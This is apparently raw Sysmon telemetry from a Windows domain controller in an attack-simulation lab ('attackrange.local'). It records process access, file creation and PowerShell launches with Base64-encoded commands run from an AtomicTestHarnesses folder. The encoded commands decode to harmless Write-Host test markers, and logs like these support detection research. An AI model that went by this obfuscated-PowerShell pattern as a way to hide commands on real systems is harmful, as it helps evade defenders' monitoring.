16:52:22.919{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235351Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.919{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235350Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.919{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235349Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.918{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-6D46-603E-68AA-00000000AD01}2712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002235348Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.918{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6D46-603E-68AA-00000000AD01}2712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+700132a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f474997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4a82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b43b0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f49ac62(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f49a232(wow64) 154100x80000000000000002235347Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.918{05ADC7E1-6D46-603E-68AA-00000000AD01}2712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -EncodedComma VwByAGkAdABlAC0ASABvAHMAdAAgADYAZABiADkAMQBjADEAYgAtAGUAYgBiADAALQA0AGEAMQA1AC0AYQBkAGIAOQAtADgANwA1ADQAOAAzADYAZQBjADQAOAA4AA==C:\Users\Administrator\Downloads\AtomicTestHarnesses\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x80000000000000002235346Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.887{05ADC7E1-6D46-603E-67AA-00000000AD01}15956ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002235345Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.778{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D46-603E-67AA-00000000AD01}15956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235344Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.778{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D46-603E-67AA-00000000AD01}15956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002235343Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.778{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=236CE0A78164F1B5C3014D02205CB8F6,SHA256=018B7167484EB304EE6450AD24489D3FB5595421EFD695B2CEF67ADFA1C38579,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002235342Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.723{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6D46-603E-67AA-00000000AD01}15956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235341Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.723{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6D46-603E-67AA-00000000AD01}15956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002235340Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:52:22.720{05ADC7E1-6D46-603E-67AA-00000000AD01}15956\PSHost.132591775426225906.15956.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002235339Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.684{05ADC7E1-6D46-603E-67AA-00000000AD01}15956ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_xrbyaol2.nbj.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235338Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.684{05ADC7E1-6D46-603E-67AA-00000000AD01}15956ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_wdxyoabq.rnm.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002235337Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.668{05ADC7E1-6D46-603E-67AA-00000000AD01}15956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_wdxyoabq.rnm.ps12021-03-02 16:52:22.668 10341000x80000000000000002235336Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.653{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-6D46-603E-67AA-00000000AD01}15956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235335Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.623{05ADC7E1-6CB1-603E-35AA-00000000AD01}148289956C:\Windows\system32\conhost.exe{05ADC7E1-6D46-603E-67AA-00000000AD01}15956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235334Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.623{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235333Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.623{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235332Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.623{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235331Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.623{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235330Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.622{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6D46-603E-67AA-00000000AD01}15956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002235329Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.622{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6D46-603E-67AA-00000000AD01}15956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+700132a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f474997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4a82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b43b0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f49ac62(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f49a232(wow64) 154100x80000000000000002235328Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.622{05ADC7E1-6D46-603E-67AA-00000000AD01}15956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -EncodedComm VwByAGkAdABlAC0ASABvAHMAdAAgADEANQA1AGYAOQBlADYAOAAtADUAMQBjAGEALQA0ADEANgBmAC0AOABiADMAZQAtADEAYQA4ADEAZAA5AGYANQBhAGEANgBmAA==C:\Users\Administrator\Downloads\AtomicTestHarnesses\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x80000000000000002235327Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.590{05ADC7E1-6D46-603E-66AA-00000000AD01}7084ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235326Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.523{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 